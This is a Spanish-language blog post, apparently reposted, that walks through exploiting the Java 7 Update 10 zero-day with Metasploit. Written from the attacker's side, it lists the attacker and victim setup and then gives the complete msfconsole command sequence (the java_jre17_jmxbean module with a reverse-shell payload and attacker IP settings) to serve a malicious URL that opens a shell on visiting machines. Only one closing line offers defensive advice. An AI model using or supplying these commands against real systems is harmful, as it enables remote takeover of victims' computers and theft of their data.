Skip to main content

Exploiting New Java 0-day with Metasploit

Exploiting New Java 0-day with Metasploit | Juno_okyo's Blog

Se ha descubierto una nueva vulnerabilidad (0-day) en las versiones de Java 7 Update 10 y anteriores, que permite a un atacante ejecutar código arbitrario en cualquier sistema operativo que cuente con esta version de Java. Actualmente esta versión es la ultima actualización  por lo tanto el 90% de los usuarios de Internet lo tienen instalado y el 50% de estos no tienen conocimiento sobre el riesgo que pueden estan corriendo.
Muy aparte, el equipo de Metasploit ha desarrollado un modulo que permite a un atacante vulnerar de una forma remota cualquier sistema operativo, ya sea Windows 8, 7, Vista y XP como tambien cualquier navegador ya sea Internet Explorer 10 y anteriores, Google Chorme, Firefox, Opera y Safari ya que tener instalado y habilitado Java en el ordenador esta se ejecuta totalmente en el sistema.
A continuacion se detallaran los procedimientos que un atacante realizara cuando desee vulnerar cualquier sistema operativo que contenga esta vulnerabilidad.

REQUERIMIENTOS:

BackTrack 5 R1 - R2 o R3 (Atacante)
Metasploit Framework (Atacante)
Windows XP - 7 - 8 (Victima)
Java 7 Update 10 (Victima)

PROCEDIMIENTOS:

En la terminal/consola tecleamos msfconsole y seguidamente ejecutamos los siguientes comandos:

-------------------------------------------------------------------------------------------------------------
use exploit/multi/browser/java_jre17_jmxbean
set payload java/shell_reverse_tcp
set lhost 192.168.1.33
set srvhost 192.168.1.33
set uripath /
exploit
-------------------------------------------------------------------------------------------------------------

Exploiting New Java 0-day with Metasploit | Juno_okyo's Blog
Estos comandos crearan una URL con nuestra IP en la que contiene los archivos maliciosos que la victima tendrá que ejecutar desde su navegador, la cual metasploit enviara los siguientes archivos tratando de vulnerar el sistema:
Exploiting New Java 0-day with Metasploit | Juno_okyo's Blog
Si nuestro exploit detecta que el sistema es vulnerable y los archivos enviados se logran ejecutar exitosamente en el navegador, esta devolverá una conexión entre nuestro ordenador y el sistema vulnerado.
Exploiting New Java 0-day with Metasploit | Juno_okyo's Blog
CONCLUSIÓN:
Se recomienda a todos los usuarios desactivar totalmente el Java del sistema para no ser victima de estos ataques tan peligrosos que pueden comprometer nuestra informacion.
Theo: http://calebbucker.blogspot.com/2013/01/exploiting-new-java-0-day-with.html

Share this with your friends
Loading...